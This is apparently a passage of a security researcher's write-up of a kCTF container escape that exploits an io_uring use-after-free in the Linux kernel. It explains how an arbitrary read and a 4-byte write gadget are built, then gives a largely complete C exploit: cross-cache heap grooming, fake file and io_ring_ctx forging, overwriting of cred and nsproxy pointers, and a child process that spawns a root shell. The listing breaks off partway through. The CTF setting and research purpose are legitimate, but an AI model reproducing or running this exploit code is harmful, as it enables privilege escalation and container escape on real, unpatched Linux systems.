I actually struggled to find a satisfactory write gadget for a few days. I was kind of spoiled by my experience finding my arbitrary read gadget and thought this would be a similarly easy search. I followed roughly the same process of going through syscalls which took an fd as an argument and tracing through them looking for calls to copy_to_user, but I didn’t have the same luck. During this time, I was discussing the topic with my very talented friend @Firzen14 and he brought up this concept here: https://googleprojectzero.blogspot.com/2022/11/a-very-powerful-clipboard-samsung-in-the-wild-exploit-chain.html#h.yfq0poarwpr9. In the P0 blogpost, they talk about how the signalfd_ctx of a signalfd file is stored in the f.file->private_data field and how the signalfd syscalls allows the attacker to perform a write of the ctx->sigmask. So in our situation, since we control the entire fake file contents, forging a fake signalfd_ctx in memory would be quite easy since we have access to an entire page of memory.

I couldn’t use this technique for my personally imposed challenge though since the technique was already published. But this did open my eyes to the concept of storing contexts and objects in the private_data field of our struct file. So at this point, I went hunting for usages of private_data in the kernel code base. As you can see, the member is used in many many places: https://elixir.bootlin.com/linux/latest/C/ident/private_data.

This was very encouraging to me since I was bound to find some way to achieve an arbitrary write with so many instances of the member being used in so many different code paths; however, I still struggled a while finding a suitable gadget. Finally, I decided to look back at io_uring itself.

Looking for instances where the file->private_data was used, I quickly found an instance right in the very function that was related to the bug. In io_msg_ring, you can see that a target_ctx of type io_ring_ctx is derived from the req->file->private data. Since we control the fake file, we control can control the private_data contents (a pointer to a fake io_ring_ctx in this case).

io_msg_ring is used to pass data from one io ring to another, and you can see that in io_fill_cqe_aux, we actually retrieve a io_uring_cqe struct from our potentially faked io_uring_ctx via io_get_cqe. Immediately, we see several WRITE_ONCE macros used to write data to this object. This was looking extremely promising. I initially was going to use this write as my gadget, but as you will see later, the write sequences and the offsets at which they occur, didn’t really fit my exploitation plan. So for now, we’ll find a 2nd write in the same code path.

Immediately after the call to io_fill_cqe_aux, there is one to io_commit_cqring using our faked io_uring_ctx:

static inline void io_commit_cqring(struct io_ring_ctx *ctx)
{
	/* order cqe stores with ring update */
	smp_store_release(&ctx->rings->cq.tail, ctx->cached_cq_tail);
}

This is basically a memcpy, we write the contents of ctx->cached_cq_tail (100% user-controlled) to &ctx->ring->cq.tail (100% user-controlled). The size of the write in this case is 4 bytes. So we have achieved an arbitrary 4 byte write. From here, it just boils down to what type of exploit you want to write, so I decided to do one I had never done in the spirit of my self-imposed challenge.

Exploitation Plan

Now that we have all the possible tools we could need, it was time to start crafting an exploitation plan. In the kCTF environment you are running as an unprivileged user inside of a container, and your goal is to escape the container and read the flag value from the host file system.

I honestly had no idea where to start in this regard, but luckily there are some good articles out there explaining the situation. This post from Cyberark was extremely helpful in understanding how containerization of a task is achieved in the kernel. And I also got some very helpful pointers from Andy Nguyen’s blog post on his kCTF exploit. Huge thanks to Andy for being one of the few to actually detail their steps for escaping the container.

Finding Init

At this point, my goal is to find the host Init task_struct in memory and find the value of a few important members: real_cred, cred, and nsproxy. real_cred is used to track the user and group IDs that were originally responsible for creating the process and unlike cred, real_cred remains constant and does not change due to things like setuid. cred is used to convey the “effective” credentials of a task, like the effective user ID for instance. Finally, and super importantly because we are trapped in a container, nsproxy is a pointer to a struct that contains all of the information about our task’s namespaces like network, mount, IPC, etc. All of these members are pointers, so if we are able to find their values via our arbitrary read, we should then be able to overwrite our own credentials and namespace in our task_struct. Luckily, the address of the init task is a constant offset from the kernel base, so once we broke KASLR with our read of the error_entry address, we can then copy those values with our arbitrary read capability since they would reside at known addresses (offsets from the init task symbol).

Forging Objects

With those values in hand, we now need to find our own task_struct in memory so that we can overwrite our members with those of init. To do this, I took advantage of the fact that the task_struct has a linked list of tasks on the system. So early in the exploit, I spawn a child process with a known name, this name fits within the task_struct comm field, and so as I traverse through the linked list of tasks on the system, I just simply check each task’s comm field for my easily identifiable child process. You can see how I do that in this code snippet:

void traverse_tasks(void)
{    
    // Process name buf
    char current_comm[16] = { 0 };

    // Get the next task after init
    uint64_t current_next = read_8_at(g_init_task + TASKS_NEXT_OFF);
    uint64_t current = current_next - TASKS_NEXT_OFF;

    if (!task_valid(current))
    { 
        err("Invalid task after init: 0x%lx", current);    
    }

    // Read the comm
    read_comm_at(current + COMM_OFF, current_comm);
    //printf("    - Address: 0x%lx, Name: '%s'\n", current, current_comm);

    // While we don't have NULL, traverse the list
    while (task_valid(current))
    {
        current_next = read_8_at(current_next);
        current = current_next - TASKS_NEXT_OFF;

        if (current == g_init_task) { break; }

        // Read the comm
        read_comm_at(current + COMM_OFF, current_comm);
        //printf("    - Address: 0x%lx, Name: '%s'\n", current, current_comm);

        // If we find the target comm, save it
        if (!strcmp(current_comm, TARGET_TASK))
        {
            g_target_task = current;
        }

        // If we find our target comm, save it
        if (!strcmp(current_comm, OUR_TASK))
        {
            g_our_task = current;
        }
    }
}

You can also see that not only did we find our target task, we also found our own task in memory. This is important for the way I chose to exploit this bug because, remember that we need to fake a few objects in memory, like the io_uring_ctx for instance. Usually this done by crafting objects in the kernel heap and somehow discoverying their address with a leak. In my case, I have a whole pipe buffer which is 4096 bytes of memory to utilize. The only problem is, I have no idea where it is. But I do know that I have an open file descriptor to it, and I know that each task has a file descriptor table inside of its files member. After some time printk some offsets, I was able to traverse through my own task’s file descriptor table and learn the address of my pipe buffer. This is because the pipe buffer page is obviously page aligned so I can just page align the address we read from the file descriptor table as the address of our UAF file. So now I know exactly in memory where my pipe buffer is, and I also know what offset onto that page our UAF struct file resides. I have a small helper function to set a “scratch space” region address as a global and then use that memory to set up our fake io_uring_ctx. You can see those functions here, first finding our pipe buffer address:

void find_pipe_buf_addr(void)
{
    // Get the base of the files array
    uint64_t files_ptr = read_8_at(g_file_array);
    
    // Adjust the files_ptr to point to our fd in the array
    files_ptr += (sizeof(uint64_t) * g_uaf_fd);

    // Get the address of our UAF file struct
    uint64_t curr_file = read_8_at(files_ptr);

    // Calculate the offset
    g_off = curr_file & 0xFFF;

    // Set the globals
    g_file_addr = curr_file;
    g_pipe_buf = g_file_addr - g_off;

    return;
}

And then determining the location of our scratch space where we will forge the fake io_uring_ctx:

// Here, all we're doing is determing what side of the page the UAF file is on,
// if its on the front half of the page, the back half is our scratch space
// and vice versa
void set_scratch_space(void)
{
    g_scratch = g_pipe_buf;
    if (g_off < 0x500) { g_scratch += 0x500; }
}

Now we have one more read to do and this is really just to make the exploit easier. In order to avoid a lot of debugging while triggering my write, I need to make sure that my fake io_uring_ctx contains as many valid fields as necessary. If you start with a completely NULL object, you will have to troubleshoot every NULL-deref kernel panic and determine where you went wrong and what kind of value that member should have had. Instead, I chose to copy a legitimate instance of a real io_uring_ctx instead by reading and copying its contents to a global buffer. Working now from a good base, our forged object can then be set-up properly to perform our arbitrary write from, you can see me using the copy and updating the necessary fields here:

void write_setup_ctx(char *buf, uint32_t what, uint64_t where)
{
    // Copy our copied real ring fd 
    memcpy(&buf[g_off], g_ring_copy, 256);

    // Set f->f_count to 1 
    uint64_t *count = (uint64_t *)&buf[g_off + 0x38];
    *count = 1;

    // Set f->private_data to our scratch space
    uint64_t *private_data = (uint64_t *)&buf[g_off + 0xc8];
    *private_data = g_scratch;

    // Set ctx->cqe_cached
    size_t cqe_cached = g_scratch + 0x240;
    cqe_cached &= 0xFFF;
    uint64_t *cached_ptr = (uint64_t *)&buf[cqe_cached];
    *cached_ptr = NULL_MEM;

    // Set ctx->cqe_sentinel
    size_t cqe_sentinel = g_scratch + 0x248;
    cqe_sentinel &= 0xFFF;
    uint64_t *sentinel_ptr = (uint64_t *)&buf[cqe_sentinel];

    // We need ctx->cqe_cached < ctx->cqe_sentinel
    *sentinel_ptr = NULL_MEM + 1;

    // Set ctx->rings so that ctx->rings->cq.tail is written to. That is at 
    // offset 0xc0 from cq base address
    size_t rings = g_scratch + 0x10;
    rings &= 0xFFF;
    uint64_t *rings_ptr = (uint64_t *)&buf[rings];
    *rings_ptr = where - 0xc0;

    // Set ctx->cached_cq_tail which is our what
    size_t cq_tail = g_scratch + 0x250;
    cq_tail &= 0xFFF;
    uint32_t *cq_tail_ptr = (uint32_t *)&buf[cq_tail];
    *cq_tail_ptr = what;

    // Set ctx->cq_wait the list head to itself (so that it's "empty")
    size_t real_cq_wait = g_scratch + 0x268;
    size_t cq_wait = (real_cq_wait & 0xFFF);
    uint64_t *cq_wait_ptr = (uint64_t *)&buf[cq_wait];
    *cq_wait_ptr = real_cq_wait;
}

Performing Our Writes

Now, it’s time to do our writes. Remember those three sequential writes we were going to use inside of io_fill_cqe_aux, but I said they wouldn’t work with the exploit plan? Well the reason was, those three writes were as follows:

cqe = io_get_cqe(ctx);
	if (likely(cqe)) {
		WRITE_ONCE(cqe->user_data, user_data);
		WRITE_ONCE(cqe->res, res);
		WRITE_ONCE(cqe->flags, cflags);

They worked really well until I went to overwrite the target nsproxy member of our target child task_struct. One of those writes inevitably overwrote the members right next to nsproxy: signal and sighand. This caused big problems for me because as interrupts occurred, those members (pointers) would be deref’d and cause the kernel to panic since they were invalid values. So I opted to just the 4-byte write instead inside io_commit_cqring. The 4-byte write also caused problems in that at some points current has it’s creds checked and with what basically amounted to a torn 8-byte write, we would leave current cred values in invalid states during these checks. This is why I had to use a child process. Huge shoutout to @pqlpql for tipping me off to this.

Now we can just use those same steps to overwrite the three members real_cred, cred, and nsproxy and now our child has all of the same privileges and capabilities including visiblity into the host root file system that init does. This is perfect, but I still wasn’t able to get the flag!

I started to panic at this point that I had seriously done something wrong. The exploit if FULL of paranoid checks: I reread every overwritten value to make sure it’s correct for instance, so I was confident that I had done the writes properly. It felt like my namespace was somehow not effective yet in the child process, like it was cached somewhere. But then I remembered in Andy Nguyen’s blog post, he used his root privileges to explictly set his namespace values with calls to setns. Once I added this step, the child was able to see the root file system and find the flag. Instead of giving my child the same namespaces as init, I was able to give it the same namespaces of itself lol. I still haven’t followed through on this to determine how setns is implemented, but this could probably be done without explicit setns calls and only with our read and write tools:

// Our child waits to be given super powers and then drops into shell
void child_exec(void)
{
    // Change our taskname 
    if (prctl(PR_SET_NAME, TARGET_TASK, NULL, NULL, NULL) != 0)
    {
        err("`prctl()` failed");
    }

    while (1)
    {
        if (*(int *)g_shmem == 0x1337)
        {
            sleep(3);
            info("Child dropping into root shell...");
            if (setns(open("/proc/self/ns/mnt", O_RDONLY), 0) == -1) { err("`setns()`"); }
            if (setns(open("/proc/self/ns/pid", O_RDONLY), 0) == -1) { err("`setns()`"); }
            if (setns(open("/proc/self/ns/net", O_RDONLY), 0) == -1) { err("`setns()`"); }
            char *args[] = {"/bin/sh", NULL, NULL};
            execve(args[0], args, NULL);
        }

        else { sleep(2); }
    }
}

And finally I was able to drop into a root shell and capture the flag, escaping the container. One huge obstacle when I tried using my exploit on the Google infrastructure was that their kernel was compiled with SELinux support and my test environment was not. This ended up not being a big deal, I had some out of band confirmation/paranoia checks I had to leave out but fortunately the arbitrary read we used isn’t actually hooked in any way by SELinux unlike most of the other fcntl syscall flags. At that point remember, we don’t know enough information to fake any objects in memory so I’d be dead in the water if that read method was ruined by SELinux.

Conclusion

This was a lot of fun for me and I was able to learn a lot. I think these types of learning challenges are great and low-stakes. They can be fun to work on with friends as well, big thanks to everyone mentioned already and also @chompie1337 who had to listen to me freak out about not being able to read the flag once I had overwritten my creds. The exploit is posted below in full, let me know if you have any trouble understanding any of it, thanks.

// Compile
// gcc sploit.c -o sploit -l:liburing.a -static -Wall

#define _GNU_SOURCE
#include <sched.h>
#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <stdarg.h>
#include <fcntl.h>
#include <string.h>
#include <unistd.h>
#include <sys/time.h>
#include <sys/resource.h>
#include <sys/msg.h>
#include <sys/timerfd.h>
#include <sys/mman.h>
#include <sys/prctl.h>

#include "liburing.h"

// /sys/kernel/slab/filp/objs_per_slab
#define OBJS_PER_SLAB 16UL
// /sys/kernel/slab/filp/cpu_partial
#define CPU_PARTIAL 52UL
// Multiplier for cross-cache arithmetic
#define OVERFLOW_FACTOR 2UL
// Largest number of objects we could allocate per Cross-cache step
#define CROSS_CACHE_MAX 8192UL
// Fixed mapping in cpu_entry_area whose contents is NULL
#define NULL_MEM 0xfffffe0000002000UL
// Reading side of pipe
#define PIPE_READ 0
// Writing side of pipe
#define PIPE_WRITE 1
// error_entry inside cpu_entry_area pointer
#define ERROR_ENTRY_ADDR 0xfffffe0000002f48UL
// Offset from `error_entry` pointer to kernel base
#define EE_OFF 0xe0124dUL
// Kernel text signature
#define KERNEL_SIGNATURE 0x4801803f51258d48UL
// Offset from kernel base to init_task
#define INIT_OFF 0x18149c0UL
// Offset from task to task->comm
#define COMM_OFF 0x738UL
// Offset from task to task->real_cred
#define REAL_CRED_OFF 0x720UL
// Offset from task to task->cred
#define CRED_OFF 0x728UL
// Offset from task to task->nsproxy
#define NSPROXY_OFF 0x780UL
// Offset from task to task->files
#define FILES_OFF 0x770UL
// Offset from task->files to &task->files->fdt
#define FDT_OFF 0x20UL
// Offset from &task->files->fdt to &task->files->fdt->fd
#define FD_ARRAY_OFF 0x8UL
// Offset from task to task->tasks.next
#define TASKS_NEXT_OFF 0x458UL
// Process name to give root creds to 
#define TARGET_TASK "blegh2"
// Our process name
#define OUR_TASK "blegh1"
// Offset from kernel base to io_uring_fops
#define FOPS_OFF 0x1220200UL

// Shared memory with child
void *g_shmem;

// Child pid
pid_t g_child = -1;

// io_uring instance to use
struct io_uring g_ring = { 0 };

// UAF file handle
int g_uaf_fd = -1;

// Track pipes
struct fd_pair {
    int fd[2];
};
struct fd_pair g_pipe = { 0 };

// The offset on the page where our `file` is
size_t g_off = 0;

// Our fake file that is a copy of a legit io_uring fd
unsigned char g_ring_copy[256] = { 0 };

// Keep track of files added in Cross-cache steps
int g_cc1_fds[CROSS_CACHE_MAX] = { 0 };
size_t g_cc1_num = 0;
int g_cc2_fds[CROSS_CACHE_MAX] = { 0 };
size_t g_cc2_num = 0;
int g_cc3_fds[CROSS_CACHE_MAX] = { 0 };
size_t g_cc3_num = 0;

// Gadgets and offsets
uint64_t g_kern_base = 0;
uint64_t g_init_task = 0;
uint64_t g_target_task = 0;
uint64_t g_our_task = 0;
uint64_t g_cred_what = 0;
uint64_t g_nsproxy_what = 0;
uint64_t g_cred_where = 0;
uint64_t g_real_cred_where = 0;
uint64_t g_nsproxy_where = 0;
uint64_t g_files = 0;
uint64_t g_fdt = 0;
uint64_t g_file_array = 0;
uint64_t g_file_addr = 0;
uint64_t g_pipe_buf = 0;
uint64_t g_scratch = 0;
uint64_t g_fops = 0;

void err(const char* format, ...)
{
    if (!format) {
        exit(EXIT_FAILURE);
    }

    fprintf(stderr, "%s", "[!] ");
    va_list args;
    va_start(args, format);
    vfprintf(stderr, format, args);
    va_end(args);
    fprintf(stderr, ": %s\n", strerror(errno));

    sleep(5);
    exit(EXIT_FAILURE);
}

void info(const char* format, ...)
{
    if (!format) {
        return;
    }
    
    fprintf(stderr, "%s", "[*] ");
    va_list args;
    va_start(args, format);
    vfprintf(stderr, format, args);
    va_end(args);
    fprintf(stderr, "%s", "\n");
}

// Get FD for test file
int get_test_fd(int victim)
{
    // These are just different for kernel debugging purposes
    char *file = NULL;
    if (victim) { file = "/etc//passwd"; }
    else { file = "/etc/passwd"; }

    int fd = open(file, O_RDONLY);
    if (fd < 0)
    {
        err("`open()` failed, file: %s", file);
    }

    return fd;
}

// Set-up the file that we're going to use as our victim object
void alloc_victim_filp(void)
{
    // Open file to register
    g_uaf_fd = get_test_fd(1);
    info("Victim fd: %d", g_uaf_fd);

    // Register the file
    int ret = io_uring_register_files(&g_ring, &g_uaf_fd, 1);
    if (ret)
    {
        err("`io_uring_register_files()` failed");
    }

    // Get hold of the sqe
    struct io_uring_sqe *sqe = NULL;
    sqe = io_uring_get_sqe(&g_ring);
    if (!sqe)
    {
        err("`io_uring_get_sqe()` failed");
    }

    // Init sqe vals
    sqe->opcode = IORING_OP_MSG_RING;
    sqe->fd = 0;
    sqe->flags |= IOSQE_FIXED_FILE;

    ret = io_uring_submit(&g_ring);
    if (ret < 0)
    {
        err("`io_uring_submit()` failed");
    }

    struct io_uring_cqe *cqe;
    ret = io_uring_wait_cqe(&g_ring, &cqe);
}

// Set CPU affinity for calling process/thread
void pin_cpu(long cpu_id)
{
    cpu_set_t mask;
    CPU_ZERO(&mask);
    CPU_SET(cpu_id, &mask);
    if (sched_setaffinity(0, sizeof(mask), &mask) == -1)
    {
        err("`sched_setaffinity()` failed: %s", strerror(errno));
    }

    return;
}

// Increase the number of FDs we can have open
void increase_fds(void)
{
    struct rlimit old_lim, lim;
	
	if (getrlimit(RLIMIT_NOFILE, &old_lim) != 0)
    {
        err("`getrlimit()` failed: %s", strerror(errno));
    }
		
	lim.rlim_cur = old_lim.rlim_max;
	lim.rlim_max = old_lim.rlim_max;

	if (setrlimit(RLIMIT_NOFILE, &lim) != 0)
    {
		err("`setrlimit()` failed: %s", strerror(errno));
    }

    info("Increased fd limit from %d to %d", old_lim.rlim_cur, lim.rlim_cur);

    return;
}

void create_pipe(void)
{
    if (pipe(g_pipe.fd) == -1)
    {
        err("`pipe()` failed");
    }
}

void release_pipe(void)
{
    close(g_pipe.fd[PIPE_WRITE]);
    close(g_pipe.fd[PIPE_READ]);
}

// Our child waits to be given super powers and then drops into shell
void child_exec(void)
{
    // Change our taskname 
    if (prctl(PR_SET_NAME, TARGET_TASK, NULL, NULL, NULL) != 0)
    {
        err("`prctl()` failed");
    }

    while (1)
    {
        if (*(int *)g_shmem == 0x1337)
        {
            sleep(3);
            info("Child dropping into root shell...");
            if (setns(open("/proc/self/ns/mnt", O_RDONLY), 0) == -1) { err("`setns()`"); }
            if (setns(open("/proc/self/ns/pid", O_RDONLY), 0) == -1) { err("`setns()`"); }
            if (setns(open("/proc/self/ns/net", O_RDONLY), 0) == -1) { err("`setns()`"); }
            char *args[] = {"/bin/sh", NULL, NULL};
            execve(args[0], args, NULL);
        }

        else { sleep(2); }
    }
}

// Set-up environment for exploit
void setup_env(void)
{
    // Make sure a page is a page and we're not on some bullshit machine
    long page_sz = sysconf(_SC_PAGESIZE);
    if (page_sz != 4096L)
    {
        err("Page size was: %ld", page_sz);
    }

    // Pin to CPU 0
    pin_cpu(0);
    info("Pinned process to core-0");

    // Increase FD limit
    increase_fds();

    // Create shared mem
    g_shmem = mmap(
        (void *)0x1337000,
        page_sz,
        PROT_READ | PROT_WRITE,
        MAP_ANONYMOUS | MAP_FIXED | MAP_SHARED,
        -1,
        0
    );
    if (g_shmem == MAP_FAILED) { err("`mmap()` failed"); }
    info("Shared memory @ 0x%lx", g_shmem);

    // Create child
    g_child = fork();
    if (g_child == -1)
    {
        err("`fork()` failed");
    }

    // Child
    if (g_child ==  0)
    {
        child_exec();
    }
    info("Spawned child: %d", g_child);

    // Change our name
    if (prctl(PR_SET_NAME, OUR_TASK, NULL, NULL, NULL) != 0)
    {
        err("`prctl()` failed");
    }

    // Create io ring
    struct io_uring_params params = { 0 };
    if (io_uring_queue_init_params(8, &g_ring, &params))
    {
        err("`io_uring_queue_init_params()` failed");
    }
    info("Created io_uring");

    // Create pipe
    info("Creating pipe...");
    create_pipe();
}

// Decrement file->f_count to 0 and free the filp
void do_uaf(void)
{
    if (io_uring_unregister_files(&g_ring))
    {
        err("`io_uring_unregister_files()` failed");
    }

    // Let the free actually happen
    usleep(100000);
}

// Cross-cache 1:
// Allocate enough objects that we have definitely allocated enough
// slabs to fill up the partial list later when we free an object from each
// slab
void cc_1(void)
{
    // Calculate the amount of objects to spray
    uint64_t spray_amt = (OBJS_PER_SLAB * (CPU_PARTIAL + 1)) * OVERFLOW_FACTOR;
    g_cc1_num = spray_amt;

    // Paranoid
    if (spray_amt > CROSS_CACHE_MAX) { err("Illegal spray amount"); }

    //info("Spraying %lu `filp` objects...", spray_amt);
    for (uint64_t i = 0; i < spray_amt; i++)
    {
        g_cc1_fds[i] = get_test_fd(0);
    }
    usleep(100000);

    return;
}

// Cross-cache 2:
// Allocate OBJS_PER_SLAB to *probably* create a new active slab
void cc_2(void)
{
    // Step 2:
    // Allocate OBJS_PER_SLAB to *probably* create a new active slab
    uint64_t spray_amt = OBJS_PER_SLAB - 1;
    g_cc2_num = spray_amt;

    //info("Spraying %lu `filp` objects...", spray_amt);
    for (uint64_t i = 0; i < spray_amt; i++)
    {
        g_cc2_fds[i] = get_test_fd(0);
    }
    usleep(100000);

    return;
}

// Cross-cache 3:
// Allocate enough objects to definitely fill the rest of the active slab
// and start a new active slab
void cc_3(void)
{
    uint64_t spray_amt = OBJS_PER_SLAB + 1;
    g_cc3_num = spray_amt;

    //info("Spraying %lu `filp` objects...", spray_amt);
    for (uint64_t i = 0; i < spray_amt; i++)
    {
        g_cc3_fds[i] = get_test_fd(0);
    }
    usleep(100000);

    return;
}

// Cross-cache 4:
// Free all the filps from steps 2, and 3. This will place our victim 
// page in the partial list completely empty
void cc_4(void)
{
    //info("Freeing `filp` objects from CC2 and CC3...");
    for (size_t i = 0; i < g_cc2_num; i++)
    {
        close(g_cc2_fds[i]);
    }

    for (size_t i = 0; i < g_cc3_num; i++)
    {
        close(g_cc3_fds[i]);
    }
    usleep(100000);

    return;
}

// Cross-cache 5:
// Free an object for each slab we allocated in Step 1 to overflow the 
// partial list and get our empty slab in the partial list freed
void cc_5(void)
{
    //info("Freeing `filp` objects to overflow CPU partial list...");
    for (size_t i = 0; i < g_cc1_num; i++)
    {
        if (i % OBJS_PER_SLAB == 0)
        {
            close(g_cc1_fds[i]);
        }
    }
    usleep(100000);

    return;
}

// Reset all state associated with a cross-cache attempt
void cc_reset(void)
{
    // Close all the remaining FDs
    info("Resetting cross-cache state...");
    for (size_t i = 0; i < CROSS_CACHE_MAX; i++)
    {
        close(g_cc1_fds[i]);
        close(g_cc2_fds[i]);
        close(g_cc3_fds[i]);
    }

    // Reset number trackers
    g_cc1_num = 0;
    g_cc2_num = 0;
    g_cc3_num = 0;
}

// Do cross cache process
void do_cc(void)
{
    // Start cross-cache process
    cc_1();
    cc_2();

    // Allocate the victim filp
    alloc_victim_filp();

    // Free the victim filp
    do_uaf();

    // Resume cross-cache process
    cc_3();
    cc_4();
    cc_5();

    // Allow pages to be freed
    usleep(100000);
}

void reset_pipe_buf(void)
{
    char buf[4096] = { 0 };
    read(g_pipe.fd[PIPE_READ], buf, 4096);
}

void zero_pipe_buf(void)
{
    char buf[4096] = { 0 };
    write(g_pipe.fd[PIPE_WRITE], buf, 4096);
}

// Offset inside of inode to inode->i_write_hint
#define HINT_OFF 0x8fUL

// By using `fcntl(F_GET_RW_HINT)` we can read a single byte at
// file->inode->i_write_hint
uint64_t read_8_at(unsigned long addr)
{
    // Set the inode address
    uint64_t inode_addr_base = addr - HINT_OFF;

    // Set up the buffer for the arbitrary read
    unsigned char buf[4096] = { 0 };

    // Iterate 8 times to read 8 bytes
    uint64_t val = 0;
    for (size_t i = 0; i < 8; i++)
    {
        // Calculate inode address
        uint64_t target = inode_addr_base + i;

        // Set up a fake file 16 times (number of files per page), we don't know
        // yet which of the 16 slots our UAF file is at
        reset_pipe_buf();
        *(uint64_t *)&buf[0x20]  = target;
        *(uint64_t *)&buf[0x120] = target;
        *(uint64_t *)&buf[0x220] = target;
        *(uint64_t *)&buf[0x320] = target;
        *(uint64_t *)&buf[0x420] = target;
        *(uint64_t *)&buf[0x520] = target;
        *(uint64_t *)&buf[0x620] = target;
        *(uint64_t *)&buf[0x720] = target;
        *(uint64_t *)&buf[0x820] = target;
        *(uint64_t *)&buf[0x920] = target;
        *(uint64_t *)&buf[0xa20] = target;
        *(uint64_t *)&buf[0xb20] = target;
        *(uint64_t *)&buf[0xc20] = target;
        *(uint64_t *)&buf[0xd20] = target;
        *(uint64_t *)&buf[0xe20] = target;
        *(uint64_t *)&buf[0xf20] = target;

        // Create the content
        write(g_pipe.fd[PIPE_WRITE], buf, 4096);

        // Read one byte back
        uint64_t arg = 0;
        if (fcntl(g_uaf_fd, F_GET_RW_HINT, &arg) == -1)
        {
            err("`fcntl()` failed");
        };

        // Add to val
        val |= (arg << (i * 8));
    }

    return val;
}

void read_comm_at(unsigned long addr, char *comm)
{
    // Set the inode address
    uint64_t inode_addr_base = addr - HINT_OFF;

    // Set up the buffer for the arbitrary read
    unsigned char buf[4096] = { 0 };

    // Iterate 15 times to read 15 bytes
    for (size_t i = 0; i < 8; i++)
    {
        // Calculate inode address
        uint64_t target = inode_addr_base + i;

        // Set up a fake file 16 times (number of files per page), we don't know
        // yet which of the 16 slots our UAF file is at
        reset_pipe_buf();
        *(uint64_t *)&buf[0x20]  = target;
        *(uint64_t *)&buf[0x120] = target;
        *(uint64_t *)&buf[0x220] = target;
        *(uint64_t *)&buf[0x320] = target;
        *(uint64_t *)&buf[0x420] = target;
        *(uint64_t *)&buf[0x520] = target;
        *(uint64_t *)&buf[0x620] = target;
        *(uint64_t *)&buf[0x720] = target;
        *(uint64_t *)&buf[0x820] = target;
        *(uint64_t *)&buf[0x920] = target;
        *(uint64_t *)&buf[0xa20] = target;
        *(uint64_t *)&buf[0xb20] = target;
        *(uint64_t *)&buf[0xc20] = target;
        *(uint64_t *)&buf[0xd20] = target;
        *(uint64_t *)&buf[0xe20] = target;
        *(uint64_t *)&buf[0xf20] = target;

        // Create the content
        write(g_pipe.fd[PIPE_WRITE], buf, 4096);

        // Read one byte back
        uint64_t arg = 0;
        if (fcntl(g_uaf_fd, F_GET_RW_HINT, &arg) == -1)
        {
            err("`fcntl()` failed");
        };

        // Add to comm buf
        comm[i] = arg;
    }
}

void write_setup_ctx(char *buf, uint32_t what, uint64_t where)
{
    // Copy our copied real ring fd 
    memcpy(&buf[g_off], g_ring_copy, 256);

    // Set f->f_count to 1 
    uint64_t *count = (uint64_t *)&buf[g_off + 0x38];
    *count = 1;

    // Set f->private_data to our scratch space
    uint64_t *private_data = (uint64_t *)&buf[g_off + 0xc8];
    *private_data = g_scratch;

    // Set ctx->cqe_cached
    size_t cqe_cached = g_scratch + 0x240;
    cqe_cached &= 0xFFF;
    uint64_t *cached_ptr = (uint64_t *)&buf[cqe_cached];
    *cached_ptr = NULL_MEM;

    // Set ctx->cqe_sentinel
    size_t cqe_sentinel = g_scratch + 0x248;
    cqe_sentinel &= 0xFFF;
    uint64_t *sentinel_ptr = (uint64_t *)&buf[cqe_sentinel];

    // We need ctx->cqe_cached < ctx->cqe_sentinel
    *sentinel_ptr = NULL_MEM + 1;

    // Set ctx->rings so that ctx->rings->cq.tail is written to. That is at 
    // offset 0xc0 from cq base address
    size_t rings = g_scratch + 0x10;
    rings &= 0xFFF;
    uint64_t *rings_ptr = (uint64_t *)&buf[rings];
    *rings_ptr = where - 0xc0;

    // Set ctx->cached_cq_tail which is our what
    size_t cq_tail = g_scratch + 0x250;
    cq_tail &= 0xFFF;
    uint32_t *cq_tail_ptr = (uint32_t *)&buf[cq_tail];
    *cq_tail_ptr = what;

    // Set ctx->cq_wait the list head to itself (so that it's "empty")
    size_t real_cq_wait = g_scratch + 0x268;
    size_t cq_wait = (real_cq_wait & 0xFFF);
    uint64_t *cq_wait_ptr = (uint64_t *)&buf[cq_wait];
    *cq_wait_ptr = real_cq_wait;
}

void write_what_where(uint32_t what, uint64_t where)
{
    // Reset the page contents
    reset_pipe_buf();

    // Setup the fake file target ctx
    char buf[4096] = { 0 };
    write_setup_ctx(buf, what, where);

    // Set contents
    write(g_pipe.fd[PIPE_WRITE], buf, 4096);

    // Get an sqe
    struct io_uring_sqe *sqe = NULL;
    sqe = io_uring_get_sqe(&g_ring);
    if (!sqe)
    {
        err("`io_uring_get_sqe()` failed");
    }

    // Set values
    sqe->opcode = IORING_OP_MSG_RING;
    sqe->fd = g_uaf_fd;

    int ret = io_uring_submit(&g_ring);
    if (ret < 0)
    {
        err("`io_uring_submit()` failed");
    }

    // Wait for the completion
    struct io_uring_cqe *cqe;
    ret = io_uring_wait_cqe(&g_ring, &cqe);
}

// So in this kernel code path, after we're done with our write-what-where, the 
// what value actually gets incremented ++ style, so we have to decrement
// the values by one each time.
// Also, we only have a 4 byte write ability so we have to split up the 8 bytes
// into 2 separate writes
void overwrite_cred(void)
{
    uint32_t val_1 = g_cred_what & 0xFFFFFFFF;
    uint32_t val_2 = (g_cred_what >> 32) & 0xFFFFFFFF;

    write_what_where(val_1 - 1, g_cred_where);
    write_what_where(val_2 - 1, g_cred_where + 0x4);
}

void overwrite_real_cred(void)
{
    uint32_t val_1 = g_cred_what & 0xFFFFFFFF;
    uint32_t val_2 = (g_cred_what >> 32) & 0xFFFFFFFF;

    write_what_where(val_1 - 1, g_real_cred_where);
    write_what_where(val_2 - 1, g_real_cred_where + 0x4);
}

void overwrite_nsproxy(void)
{
    uint32_t val_1 = g_nsproxy_what & 0xFFFFFFFF;
    uint32_t val_2 = (g_nsproxy_what >> 32) & 0xFFFFFFFF;

    write_what_where(val_1 - 1, g_nsproxy_where);
    write_what_where(val_2 - 1, g_nsproxy_where + 0x4);
}

// Try to fuzzily validate leaked task addresses lol
int task_valid(uint64_t task)
{
    if ((uint16_t)(task >> 48) == 0xFFFF) { return 1; }
    else { return 0; } 
}

void traverse_tasks(void)
{    
    // Process name buf
    char current_comm[16] = { 0 };

    // Get the next task after init
    uint64_t current_next = read_8_at(g_init_task + TASKS_NEXT_OFF);
    uint64_t current = current_next - TASKS_NEXT_OFF;

    if (!task_valid(current))
    { 
        err("Invalid task after init: 0x%lx", current);    
    }

    // Read the comm
    read_comm_at(current + COMM_OFF, current_comm);
    //printf("    - Address: 0x%lx, Name: '%s'\n", current, current_comm);

    // While we don't have NULL, traverse the list
    while (task_valid(current))
    {
        current_next = read_8_at(current_next);
        current = current_next - TASKS_NEXT_OFF;

        if (current == g_init_task) { break; }

        // Read the comm
        read_comm_at(current + COMM_OFF, current_comm);
        //printf("    - Address: 0x%lx, Name: '%s'\n", current, current_comm);

        // If we find the target comm, save it
        if (!strcmp(current_comm, TARGET_TASK))
